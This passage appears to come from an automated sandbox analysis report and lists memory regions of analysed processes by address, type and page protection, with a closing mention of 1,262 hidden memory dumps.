heap
page read and write
2417F200000
trusted library allocation
page read and write
FB87FFE000
unkown
page readonly
23FE449F000
heap
page read and write
24A088F7000
heap
page read and write
23FE42ED000
heap
page read and write
7866000
heap
page read and write
237E12A0000
heap
page read and write
2B11000
heap
page read and write
23FE3E6E000
heap
page read and write
24A0327A000
heap
page read and write
7FFB4A3B0000
trusted library allocation
page read and write
2B11000
heap
page read and write
21E63F20000
heap
page read and write
23FE44A5000
heap
page read and write
78E9000
heap
page read and write
2B11000
heap
page read and write
23FE3C64000
heap
page read and write
24A03275000
heap
page read and write
24A08781000
trusted library allocation
page read and write
23FE4526000
heap
page read and write
24A08A00000
trusted library allocation
page read and write
23FE3C39000
heap
page read and write
29F0000
unkown
page execute and read and write
2B16000
heap
page read and write
23FE4585000
heap
page read and write
237E12DD000
heap
page read and write
23FE3C19000
heap
page read and write
2B11000
heap
page read and write
23FE440D000
heap
page read and write
21E74111000
trusted library allocation
page read and write
23FE457D000
heap
page read and write
78B3000
heap
page read and write
24A088C2000
heap
page read and write
4B87000
unkown
page execute and read and write
2B11000
heap
page read and write
101A000
heap
page read and write
237E137E000
heap
page read and write
2CF0000
heap
page read and write
23EE000
system
page execute and read and write
23FE456E000
heap
page read and write
2417EBD0000
heap
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
2417EBFF000
heap
page read and write
46E6000
unclassified section
page read and write
1F0000
unkown
page readonly
2B11000
heap
page read and write
2B11000
heap
page read and write
237E1350000
heap
page read and write
BCFDDF8000
stack
page read and write
8C0000
unkown
page readonly
23FE4566000
heap
page read and write
24A032BB000
heap
page read and write
23FE44F9000
heap
page read and write
1013000
heap
page read and write
2B11000
heap
page read and write
2FDD000
direct allocation
page execute and read and write
1A00000
unclassified section
page execute and read and write
9F0000
unkown
page read and write
101E000
heap
page read and write
23FE4383000
heap
page read and write
21E64017000
heap
page read and write
931000
unkown
page execute read
2B11000
heap
page read and write
2417F30F000
trusted library allocation
page read and write
24A03302000
heap
page read and write
23FE456A000
heap
page read and write
2956000
heap
page read and write
237E138C000
heap
page read and write
2B11000
heap
page read and write
11E4000
heap
page read and write
2B11000
heap
page read and write
24A08750000
trusted library allocation
page read and write
2B11000
heap
page read and write
BCFDE3E000
stack
page read and write
23FE4326000
heap
page read and write
2E00000
unclassified section
page execute and read and write
1831000
direct allocation
page execute and read and write
2417F160000
heap
page read and write
2897000
heap
page read and write
8B0000
unkown
page readonly
2B11000
heap
page read and write
21E6456C000
trusted library allocation
page read and write
23FE449F000
heap
page read and write
2B11000
heap
page read and write
2474000
heap
page read and write
21E64566000
trusted library allocation
page read and write
620000
heap
page read and write
FB874F7000
stack
page read and write
23FE3C40000
heap
page read and write
2482000
unkown
page read and write
275C000
unkown
page read and write
21E63F7A000
heap
page read and write
FB88AFE000
unkown
page readonly
24A0881F000
heap
page read and write
3202000
unclassified section
page read and write
A2BA7FC000
stack
page read and write
23FE449F000
heap
page read and write
23FE3C8B000
heap
page read and write
23FE3C7F000
heap
page read and write
1030000
unkown
page readonly
23FE4575000
heap
page read and write
19F0000
heap
page read and write
23FE449F000
heap
page read and write
2B11000
heap
page read and write
786B000
heap
page read and write
7FFB4A3E0000
trusted library allocation
page read and write
101E000
heap
page read and write
23FE4568000
heap
page read and write
23FE4585000
heap
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
23FE4575000
heap
page read and write
947000
unkown
page readonly
23FE4585000
heap
page read and write
23FE449F000
heap
page read and write
23FE44FB000
heap
page read and write
21E645AC000
trusted library allocation
page read and write
2C90000
trusted library allocation
page read and write
2B11000
heap
page read and write
237E1383000
heap
page read and write
3EA02000
system
page read and write
23FE44AD000
heap
page read and write
2400000
unclassified section
page execute and read and write
11F1000
heap
page read and write
2B11000
heap
page read and write
78D6000
heap
page read and write
2417EBB0000
heap
page read and write
130000
unkown
page readonly
2B11000
heap
page read and write
2417EA70000
system
page execute and read and write
23FE3C40000
heap
page read and write
FB877FE000
unkown
page readonly
FB889F9000
stack
page read and write
500000
unkown
page readonly
3AF8000
unkown
page read and write
7FFB4A270000
trusted library allocation
page execute and read and write
25E0000
heap
page read and write
23FE43BC000
heap
page read and write
289D000
heap
page read and write
24A08779000
trusted library allocation
page read and write
BCFEC8D000
stack
page read and write
23FE4585000
heap
page read and write
237E1315000
heap
page read and write
23FE456E000
heap
page read and write
140000
unkown
page readonly
2B11000
heap
page read and write
7FFB4A210000
trusted library allocation
page execute and read and write
24A03D00000
trusted library allocation
page read and write
BCFDFB9000
stack
page read and write
2B11000
heap
page read and write
21E62530000
trusted library allocation
page read and write
21E7C718000
heap
page read and write
23FE3C1B000
heap
page read and write
7878000
heap
page read and write
237E138C000
heap
page read and write
2B11000
heap
page read and write
628000
heap
page read and write
23FE4566000
heap
page read and write
2542000
unkown
page read and write
2B11000
heap
page read and write
A2BA8FB000
stack
page read and write
23FE3C64000
heap
page read and write
11E4000
heap
page read and write
8F0000
unkown
page read and write
23FE3C84000
heap
page read and write
930000
unkown
page readonly
29F4000
heap
page read and write
100E000
heap
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
6F0000
unkown
page readonly
23FE3DD8000
heap
page read and write
23FE436A000
heap
page read and write
23FE4566000
heap
page read and write
23FE438E000
heap
page read and write
237E11D0000
heap
page read and write
23FE4563000
heap
page read and write
6E0000
unkown
page readonly
2417F400000
trusted library allocation
page read and write
23FE3DFB000
heap
page read and write
23FE3C99000
heap
page read and write
24A08711000
trusted library allocation
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
23FE4313000
heap
page read and write
24A088FC000
heap
page read and write
23FE44D8000
heap
page read and write
23FE3DCD000
heap
page read and write
237E10D0000
heap
page read and write
2B11000
heap
page read and write
79F0000
trusted library allocation
page read and write
7FFB4A200000
trusted library allocation
page read and write
945000
unkown
page read and write
A2BA5FE000
stack
page read and write
237E1382000
heap
page read and write
2B11000
heap
page read and write
23FE456E000
heap
page read and write
21E640C0000
heap
page execute and read and write
2945000
heap
page read and write
2EB0000
direct allocation
page execute and read and write
7FFB4A301000
trusted library allocation
page read and write
237E2BDD000
heap
page read and write
23FE4564000
heap
page read and write
23FE43FF000
heap
page read and write
2B11000
heap
page read and write
21E624E3000
heap
page read and write
2B11000
heap
page read and write
237E1390000
heap
page read and write
FB8927E000
stack
page read and write
23FE3C7F000
heap
page read and write
21E64100000
heap
page execute and read and write
23FE4568000
heap
page read and write
23FE3C97000
heap
page read and write
2B11000
heap
page read and write
23FE3C7F000
heap
page read and write
3D7A000
unclassified section
page read and write
7892000
heap
page read and write
21E62620000
heap
page read and write
8E0000
unkown
page read and write
23FE456C000
heap
page read and write
237E137D000
heap
page read and write
DF0000
heap
page read and write
7FFB4A17D000
trusted library allocation
page execute and read and write
29F4000
heap
page read and write
23FE455D000
heap
page read and write
237E1399000
heap
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
BCFDBFD000
stack
page read and write
2482000
unkown
page read and write
237E137D000
heap
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
7FFB4A3D0000
trusted library allocation
page read and write
182D000
direct allocation
page execute and read and write
23FE4566000
heap
page read and write
23FE436F000
heap
page read and write
37D4000
unkown
page read and write
28E1000
heap
page read and write
2B11000
heap
page read and write
78CC000
heap
page read and write
2B11000
heap
page read and write
23FE43AF000
heap
page read and write
2888000
heap
page read and write
3EAC2000
system
page read and write
FB875FE000
unkown
page readonly
2417F4CE000
trusted library allocation
page read and write
24A046A0000
trusted library allocation
page read and write
21E62370000
heap
page read and write
28F4000
heap
page read and write
2B11000
heap
page read and write
23FE3DC6000
heap
page read and write
23FE4566000
heap
page read and write
BCFDC7E000
stack
page read and write
290C000
heap
page read and write
21E62439000
heap
page read and write
2EA4000
heap
page read and write
2474000
heap
page read and write
2B11000
heap
page read and write
237E1260000
heap
page read and write
24A0890A000
heap
page read and write
24A08710000
trusted library allocation
page read and write
21E74B2A000
trusted library allocation
page read and write
23FE44D8000
heap
page read and write
21E65CE1000
trusted library allocation
page read and write
2B11000
heap
page read and write
130000
unkown
page readonly
23FE4527000
heap
page read and write
21E64198000
trusted library allocation
page read and write
24A03306000
heap
page read and write
23FE44D7000
heap
page read and write
2B11000
heap
page read and write
21E62560000
trusted library allocation
page read and write
23FE4526000
heap
page read and write
2470000
heap
page read and write
2B11000
heap
page read and write
23FE42FE000
heap
page read and write
23FE4304000
heap
page read and write
2897000
heap
page read and write
24A08A50000
trusted library allocation
page read and write
2417EBA0000
heap
page read and write
22B0000
unkown
page readonly
7FFB4A310000
trusted library allocation
page execute and read and write
23FE3E65000
heap
page read and write
24A08846000
heap
page read and write
2B11000
heap
page read and write
23FE4575000
heap
page read and write
24A08800000
heap
page read and write
1201000
heap
page read and write
11E4000
heap
page read and write
2B11000
heap
page read and write
237E1388000
heap
page read and write
78A8000
heap
page read and write
21E63F9B000
heap
page read and write
2B11000
heap
page read and write
860000
unkown
page read and write
23FE4393000
heap
page read and write
21E645A2000
trusted library allocation
page read and write
23FE4566000
heap
page read and write
23FE3300000
heap
page read and write
21E63FE6000
heap
page read and write
2B11000
heap
page read and write
23FE4585000
heap
page read and write
21E63F48000
heap
page read and write
76A000
stack
page read and write
237E1315000
heap
page read and write
2B11000
heap
page read and write
3ECDC000
system
page read and write
275C000
unkown
page read and write
237E1280000
heap
page read and write
611000
unkown
page readonly
78DC000
heap
page read and write
24A03B1A000
heap
page read and write
1480000
direct allocation
page read and write
D70000
heap
page read and write
23FE8890000
heap
page read and write
7B30000
heap
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
3181000
direct allocation
page execute and read and write
78EC000
heap
page read and write
2B11000
heap
page read and write
A2BACFE000
stack
page read and write
24A08A60000
trusted library allocation
page read and write
23FE4575000
heap
page read and write
21E62430000
heap
page read and write
21E6246E000
heap
page read and write
785B000
heap
page read and write
4FC000
stack
page read and write
78DF000
heap
page read and write
23FE4575000
heap
page read and write
2B11000
heap
page read and write
237E135D000
heap
page read and write
23FE4383000
heap
page read and write
2B11000
heap
page read and write
23FE456A000
heap
page read and write
23FE3DFE000
heap
page read and write
2B11000
heap
page read and write
133E000
stack
page read and write
23FE449F000
heap
page read and write
21E7C6D0000
heap
page read and write
21E7C6CA000
heap
page read and write
24A08863000
heap
page read and write
24A08700000
trusted library allocation
page read and write
23FE4576000
heap
page read and write
237E1355000
heap
page read and write
2B11000
heap
page read and write
23FE2F39000
heap
page read and write
4A0A000
unclassified section
page read and write
23FE44CB000
heap
page read and write
22A0000
heap
page read and write
2B11000
heap
page read and write
101E000
heap
page read and write
7FFB4A390000
trusted library allocation
page read and write
23FE456E000
heap
page read and write
289D000
heap
page read and write
23FE4305000
heap
page read and write
21E64BDC000
trusted library allocation
page read and write
2B11000
heap
page read and write
120000
unkown
page readonly
2B11000
heap
page read and write
23FE3DDB000
heap
page read and write
2B11000
heap
page read and write
24A03B5A000
heap
page read and write
947000
unkown
page readonly
7FFB4A440000
trusted library allocation
page read and write
21E6401C000
heap
page read and write
4FC000
stack
page read and write
7872000
heap
page read and write
7FFB4A340000
trusted library allocation
page execute and read and write
23FE4402000
heap
page read and write
23FE4305000
heap
page read and write
13C1000
unkown
page readonly
23FE44F7000
heap
page read and write
237E1384000
heap
page read and write
2B11000
heap
page read and write
23FE3C43000
heap
page read and write
23FE4516000
heap
page read and write
23FE3C7B000
heap
page read and write
38C4000
unclassified section
page read and write
23FE4563000
heap
page read and write
21E65DAA000
trusted library allocation
page read and write
6E0000
unkown
page readonly
24A0322B000
heap
page read and write
23FE43A9000
heap
page read and write
2B11000
heap
page read and write
700000
unkown
page readonly
29F4000
heap
page read and write
2B11000
heap
page read and write
21E7C63E000
heap
page read and write
930000
unkown
page readonly
2900000
unkown
page readonly
23FE3DB2000
heap
page read and write
23FE4326000
heap
page read and write
2900000
unkown
page readonly
237E1350000
heap
page read and write
14C0000
direct allocation
page read and write
23FE3C1F000
heap
page read and write
21E63F40000
heap
page read and write
23FE4482000
heap
page read and write
85F000
stack
page read and write
23FE4563000
heap
page read and write
2898000
heap
page read and write
9B0000
unkown
page readonly
23FE3C90000
heap
page read and write
23FE4393000
heap
page read and write
2B11000
heap
page read and write
23FE456E000
heap
page read and write
23FE43B2000
heap
page read and write
24A03290000
heap
page read and write
961000
unkown
page readonly
2B11000
heap
page read and write
24A0884F000
heap
page read and write
2417F170000
trusted library allocation
page read and write
21E65BAC000
trusted library allocation
page read and write
2B11000
heap
page read and write
947000
unkown
page readonly
2B11000
heap
page read and write
23FE44F1000
heap
page read and write
23FE4568000
heap
page read and write
21E624BB000
heap
page read and write
7FFB4A160000
trusted library allocation
page read and write
FB878FC000
stack
page read and write
237E12C6000
heap
page read and write
78F2000
heap
page read and write
2417EBFA000
heap
page read and write
318C000
unkown
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
23FE3DB3000
heap
page read and write
24A08A40000
trusted library allocation
page read and write
7FFB4A480000
trusted library allocation
page read and write
2B11000
heap
page read and write
BCFE1BB000
stack
page read and write
FB86F4B000
stack
page read and write
14DB000
heap
page read and write
18A2000
direct allocation
page execute and read and write
237E1355000
heap
page read and write
2B11000
heap
page read and write
23FE3E31000
heap
page read and write
C9C000
stack
page read and write
2B11000
heap
page read and write
24A08A20000
trusted library allocation
page read and write
2B11000
heap
page read and write
24A088C4000
heap
page read and write
2B11000
heap
page read and write
23FE3E31000
heap
page read and write
21E74180000
trusted library allocation
page read and write
101E000
heap
page read and write
29F0000
heap
page read and write
23FE456A000
heap
page read and write
2B11000
heap
page read and write
24A0885C000
heap
page read and write
E38000
heap
page read and write
23FE3C7B000
heap
page read and write
23FE450C000
heap
page read and write
E38000
heap
page read and write
23FE3C1E000
heap
page read and write
11E4000
heap
page read and write
2417F090000
heap
page read and write
2417F303000
trusted library allocation
page read and write
23FE3C12000
heap
page read and write
21E65BB4000
trusted library allocation
page read and write
21E62410000
trusted library allocation
page read and write
9B1000
unkown
page execute read
BCFE13E000
stack
page read and write
23FE432B000
heap
page read and write
23FE82C2000
trusted library allocation
page read and write
794F000
heap
page read and write
140000
unkown
page readonly
7FFB4A400000
trusted library allocation
page read and write
24A039E0000
trusted library allocation
page read and write
23FE457D000
heap
page read and write
2B11000
heap
page read and write
860000
unkown
page read and write
8D0000
heap
page read and write
24A08A20000
trusted library allocation
page read and write
23FE455D000
heap
page read and write
7FFB4A2F0000
trusted library allocation
page read and write
24A03297000
heap
page read and write
23FE3C15000
heap
page read and write
23FE3DE7000
heap
page read and write
3B97000
unclassified section
page execute and read and write
5F0000
heap
page read and write
931000
unkown
page execute read
295A000
heap
page read and write
23FE449F000
heap
page read and write
23FE4395000
heap
page read and write
2B11000
heap
page read and write
43C2000
unclassified section
page read and write
23FE44B8000
heap
page read and write
2B11000
heap
page read and write
24A088E7000
heap
page read and write
237E135A000
heap
page read and write
7FFB4A320000
trusted library allocation
page execute and read and write
8C0000
unkown
page readonly
23FE3C3E000
heap
page read and write
21E624B5000
heap
page read and write
8E0000
unkown
page read and write
7FFB4A3A0000
trusted library allocation
page read and write
23FE44AF000
heap
page read and write
23FE3C98000
heap
page read and write
21E6247A000
heap
page read and write
5F0000
heap
page read and write
2B11000
heap
page read and write
BCFDA7E000
stack
page read and write
5587000
unkown
page execute and read and write
784D000
heap
page read and write
2B11000
heap
page read and write
8BE000
stack
page read and write
2976000
heap
page read and write
23FE455D000
heap
page read and write
A2BA9FE000
stack
page read and write
23FE4301000
heap
page read and write
BCFEB8F000
stack
page read and write
23FE3C77000
heap
page read and write
237E135A000
heap
page read and write
24A0325A000
heap
page read and write
7FFB4A154000
trusted library allocation
page read and write
23FE42EF000
heap
page read and write
2B11000
heap
page read and write
25C0000
heap
page read and write
14D7000
heap
page read and write
23FE457D000
heap
page read and write
23FE3DFC000
heap
page read and write
23FE4407000
heap
page read and write
24A03200000
heap
page read and write
7FFB4A380000
trusted library allocation
page read and write
21E63F7E000
heap
page read and write
24A088CA000
heap
page read and write
237E137C000
heap
page read and write
23FE4526000
heap
page read and write
2B11000
heap
page read and write
24A03A15000
heap
page read and write
23FE4568000
heap
page read and write
7FFB4A430000
trusted library allocation
page read and write
23FE3DDB000
heap
page read and write
2B11000
heap
page read and write
23FE456A000
heap
page read and write
292E000
heap
page read and write
2B11000
heap
page read and write
23FE3C11000
heap
page read and write
23FE4326000
heap
page read and write
21E74409000
trusted library allocation
page read and write
2B11000
heap
page read and write
23FE3C64000
heap
page read and write
101E000
heap
page read and write
2C90000
trusted library allocation
page read and write
2B11000
heap
page read and write
237E1355000
heap
page read and write
23FE3C7B000
heap
page read and write
288C000
heap
page read and write
11E4000
heap
page read and write
23FE449F000
heap
page read and write
931000
unkown
page execute read
23FE3DCC000
heap
page read and write
93E000
unkown
page readonly
11E0000
heap
page read and write
23FE2F20000
heap
page read and write
23FE4367000
heap
page read and write
24A08885000
heap
page read and write
23FE4568000
heap
page read and write
2B11000
heap
page read and write
2913000
heap
page read and write
2B11000
heap
page read and write
23FE4390000
heap
page read and write
510000
heap
page read and write
23FE3C45000
heap
page read and write
23FE450D000
heap
page read and write
23FE4402000
heap
page read and write
2B11000
heap
page read and write
28CF000
stack
page read and write
23FE4585000
heap
page read and write
2B11000
heap
page read and write
24A08856000
heap
page read and write
237E1399000
heap
page read and write
7861000
heap
page read and write
24A08712000
trusted library allocation
page read and write
FB879FE000
unkown
page readonly
21E74120000
trusted library allocation
page read and write
21E64540000
trusted library allocation
page read and write
2470000
heap
page read and write
1201000
heap
page read and write
A2BABFD000
stack
page read and write
23FE42FE000
heap
page read and write
23FE3304000
heap
page read and write
78E3000
heap
page read and write
2DA0000
trusted library allocation
page execute and read and write
24A039A1000
trusted library allocation
page read and write
21E7C990000
heap
page read and write
23FE3DE7000
heap
page read and write
945000
unkown
page read and write
399000
unkown
page read and write
23FE3C19000
heap
page read and write
23FE3DD2000
heap
page read and write
23FE42D1000
heap
page read and write
101E000
heap
page read and write
23FE3C88000
heap
page read and write
24A087E0000
trusted library allocation
page read and write
24A03B04000
heap
page read and write
32C2000
unclassified section
page read and write
23FE43A9000
heap
page read and write
1024000
heap
page read and write
23FE42F1000
heap
page read and write
2897000
heap
page read and write
78EF000
heap
page read and write
2B11000
heap
page read and write
945000
unkown
page read and write
2D00000
trusted library allocation
page read and write
21E7C470000
heap
page read and write
2B11000
heap
page read and write
23FE3E13000
heap
page read and write
1200000
heap
page read and write
23FE3C89000
heap
page read and write
23FE3DE7000
heap
page read and write
23FE4566000
heap
page read and write
23FE42F7000
heap
page read and write
237E12E0000
heap
page read and write
24A032A1000
heap
page read and write
23FE4411000
heap
page read and write
24A08730000
trusted library allocation
page read and write
21E63FCA000
heap
page read and write
2E7E000
stack
page read and write
287F000
stack
page read and write
21E625B0000
heap
page read and write
23FE3C86000
heap
page read and write
BCFD7F3000
stack
page read and write
BCFDF39000
stack
page read and write
23FE42F7000
heap
page read and write
28F0000
heap
page read and write
2B11000
heap
page read and write
102F000
stack
page read and write
23FE438E000
heap
page read and write
23FE42FA000
heap
page read and write
2B11000
heap
page read and write
D9A000
stack
page read and write
23FE457D000
heap
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
11D0000
heap
page read and write
2B10000
heap
page read and write
BCFDD7D000
stack
page read and write
23FE43AE000
heap
page read and write
1030000
unkown
page readonly
510000
heap
page read and write
24A09000000
heap
page read and write
22A0000
heap
page read and write
3C8A000
unkown
page read and write
2893000
heap
page read and write
D70000
heap
page read and write
23FE3DD7000
heap
page read and write
970000
unkown
page read and write
23FE3C44000
heap
page read and write
21E7C630000
heap
page read and write
1201000
heap
page read and write
BCFED0B000
stack
page read and write
BCFDEB7000
stack
page read and write
237E12DC000
heap
page read and write
3DF0000
unkown
page execute and read and write
23FE3C7F000
heap
page read and write
2417F30A000
trusted library allocation
page read and write
9D0000
unkown
page readonly
2B11000
heap
page read and write
23FE4402000
heap
page read and write
23FE457D000
heap
page read and write
23FE44AB000
heap
page read and write
23FE86C0000
trusted library allocation
page read and write
2B11000
heap
page read and write
237E139A000
heap
page read and write
2B11000
heap
page read and write
24A087F0000
trusted library allocation
page read and write
1300000
direct allocation
page read and write
31F2000
direct allocation
page execute and read and write
21E62457000
heap
page read and write
28F4000
heap
page read and write
23FE4520000
heap
page read and write
33F0000
unkown
page execute and read and write
2417F313000
trusted library allocation
page read and write
BCFDAFE000
stack
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
143F000
stack
page read and write
1028000
heap
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
237E135A000
heap
page read and write
7FFB4A4A0000
trusted library allocation
page read and write
23FE456C000
heap
page read and write
2897000
heap
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
3A56000
unclassified section
page read and write
2B11000
heap
page read and write
23FE4314000
heap
page read and write
69F0BFF000
stack
page read and write
E30000
heap
page read and write
2B11000
heap
page read and write
24A08740000
trusted library allocation
page read and write
14C0000
direct allocation
page read and write
23FE456A000
heap
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
23FE456E000
heap
page read and write
23FE4479000
heap
page read and write
23FE42D0000
heap
page read and write
600000
unkown
page read and write
237E135D000
heap
page read and write
7FFB4A490000
trusted library allocation
page read and write
2B11000
heap
page read and write
7FFB4A4B0000
trusted library allocation
page read and write
2B11000
heap
page read and write
930000
unkown
page readonly
11E4000
heap
page read and write
2B11000
heap
page read and write
237E1355000
heap
page read and write
2FFA000
unkown
page read and write
23FE3C40000
heap
page read and write
237E1355000
heap
page read and write
8C0000
unkown
page readonly
2B11000
heap
page read and write
23FE3C91000
heap
page read and write
331E000
unkown
page read and write
2B11000
heap
page read and write
24A08AB0000
remote allocation
page read and write
2B11000
heap
page read and write
3BE8000
unclassified section
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
628000
heap
page read and write
611000
unkown
page readonly
237E137F000
heap
page read and write
23FE3C77000
heap
page read and write
23FE3C39000
heap
page read and write
23FE3C40000
heap
page read and write
2417F170000
trusted library allocation
page read and write
237E138C000
heap
page read and write
2417F316000
trusted library allocation
page read and write
21E65DA6000
trusted library allocation
page read and write
23FE4518000
heap
page read and write
23FE4374000
heap
page read and write
237E12C6000
heap
page read and write
23FE44C9000
heap
page read and write
21E625B4000
heap
page read and write
23FE3C39000
heap
page read and write
24A03160000
heap
page read and write
947000
unkown
page readonly
23FE456C000
heap
page read and write
920000
unkown
page read and write
2417EBD7000
heap
page read and write
7FFB4A170000
trusted library allocation
page read and write
7FFB4A4C0000
trusted library allocation
page read and write
2897000
heap
page read and write
23FE3C91000
heap
page read and write
23FE457D000
heap
page read and write
23FE457F000
heap
page read and write
21E64BAA000
trusted library allocation
page read and write
2B11000
heap
page read and write
23FE3C10000
heap
page read and write
21E623B0000
heap
page read and write
24A08AB0000
remote allocation
page read and write
7FFB4A15D000
trusted library allocation
page execute and read and write
23FE456A000
heap
page read and write
23FE3E37000
heap
page read and write
23FE4575000
heap
page read and write
803F000
stack
page read and write
237E138C000
heap
page read and write
23FE4362000
heap
page read and write
23FE3DDF000
heap
page read and write
2B11000
heap
page read and write
237E1384000
heap
page read and write
288C000
heap
page read and write
2B11000
heap
page read and write
23FE438C000
heap
page read and write
2B11000
heap
page read and write
7945000
heap
page read and write
24A032B8000
heap
page read and write
2B11000
heap
page read and write
23FE3150000
heap
page read and write
2B11000
heap
page read and write
23FE449F000
heap
page read and write
2B11000
heap
page read and write
23FE3DC0000
heap
page read and write
2C10000
trusted library allocation
page read and write
23FE3C19000
heap
page read and write
7FFB4A460000
trusted library allocation
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
23FE3C98000
heap
page read and write
7842000
heap
page read and write
2417F4BE000
trusted library allocation
page read and write
23FE4575000
heap
page read and write
24A03A02000
heap
page read and write
23FE4506000
heap
page read and write
237E12E3000
heap
page read and write
E30000
heap
page read and write
1F0000
unkown
page readonly
6F0000
unkown
page readonly
7FFB4A332000
trusted library allocation
page read and write
23FE3410000
trusted library allocation
page read and write
11E4000
heap
page read and write
1015000
heap
page read and write
23FE3C81000
heap
page read and write
168D000
direct allocation
page execute and read and write
23FE3DD4000
heap
page read and write
2B11000
heap
page read and write
11E4000
heap
page read and write
23FE4526000
heap
page read and write
1000000
heap
page read and write
23FE4514000
heap
page read and write
75E000
stack
page read and write
23FE4564000
heap
page read and write
7885000
heap
page read and write
23FE3C98000
heap
page read and write
788A000
heap
page read and write
2B11000
heap
page read and write
2E68000
unkown
page read and write
75E000
stack
page read and write
23FE3C98000
heap
page read and write
23FE3E36000
heap
page read and write
23FE44CE000
heap
page read and write
409E000
unclassified section
page read and write
23FE4563000
heap
page read and write
147E000
stack
page read and write
23FE44C5000
heap
page read and write
931000
unkown
page execute read
A2BAAFF000
stack
page read and write
7FFB4A236000
trusted library allocation
page execute and read and write
2B11000
heap
page read and write
1689000
direct allocation
page execute and read and write
24A039F0000
trusted library allocation
page read and write
23FE3C39000
heap
page read and write
9D0000
unkown
page readonly
620000
heap
page read and write
11E4000
heap
page read and write
23FE3C22000
heap
page read and write
23FE4585000
heap
page read and write
2C39000
heap
page read and write
8A0000
unkown
page readonly
23FE457D000
heap
page read and write
23FE4318000
heap
page read and write
23FE438E000
heap
page read and write
69F03FE000
stack
page read and write
2B11000
heap
page read and write
24A03B00000
heap
page read and write
76A000
stack
page read and write
23FE3DBE000
heap
page read and write
2B11000
heap
page read and write
237E1384000
heap
page read and write
24A04220000
trusted library allocation
page read and write
7930000
trusted library allocation
page read and write
23FE3C39000
heap
page read and write
9F0000
unkown
page read and write
24A08860000
trusted library allocation
page read and write
23FE3C89000
heap
page read and write
21E6248E000
heap
page read and write
23FE3E00000
heap
page read and write
1E0000
unkown
page readonly
23FE44A3000
heap
page read and write
8A0000
unkown
page readonly
23FE3C39000
heap
page read and write
24A04040000
trusted library allocation
page read and write
4597000
unclassified section
page execute and read and write
288E000
heap
page read and write
945000
unkown
page read and write
23FE449F000
heap
page read and write
1314000
heap
page read and write
23FE456E000
heap
page read and write
7FFB4A206000
trusted library allocation
page read and write
24A08AB0000
remote allocation
page read and write
1019000
heap
page read and write
2B11000
heap
page read and write
21E7C69E000
heap
page read and write
23FE456A000
heap
page read and write
3F0C4000
system
page read and write
91E000
stack
page read and write
154C000
heap
page read and write
23FE3C98000
heap
page read and write
2B11000
heap
page read and write
23FE3DDA000
heap
page read and write
24A03329000
heap
page read and write
2B11000
heap
page read and write
23FE456A000
heap
page read and write
23FE455D000
heap
page read and write
There are 1262 hidden memdumps, click here to show them.